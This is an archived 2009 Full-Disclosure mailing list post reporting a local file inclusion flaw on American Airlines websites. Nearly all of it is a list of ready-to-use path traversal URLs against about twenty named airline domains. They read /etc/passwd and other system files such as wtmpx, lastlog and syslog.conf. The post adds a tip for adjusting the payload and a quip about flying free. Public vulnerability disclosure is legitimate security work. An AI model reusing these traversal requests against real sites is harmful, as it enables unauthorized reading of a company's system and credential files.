lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <5f425f480907161839x2829dc61o52821915376183d@mail.gmail.com>
Date: Thu, 16 Jul 2009 20:39:29 -0500
From: Bob Smith <bobbyhadababyitsaboy@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: American Airlines (multiple domains) Local File
	Include

American Airlines' domains have been vulnerable to Local file Include
(I wonder if anyone has flown free using this)

http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p=
http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p=
http://www.touraa.com/aa/i18nForward.do?p=
and some senstive files i found
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts

screen shots
http://i41.tinypic.com/fcns7t.jpg
http://i25.tinypic.com/359z85z.jpg

it's been reported and they don't feel like responding
(if the page doesn't work try taking off a ../)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ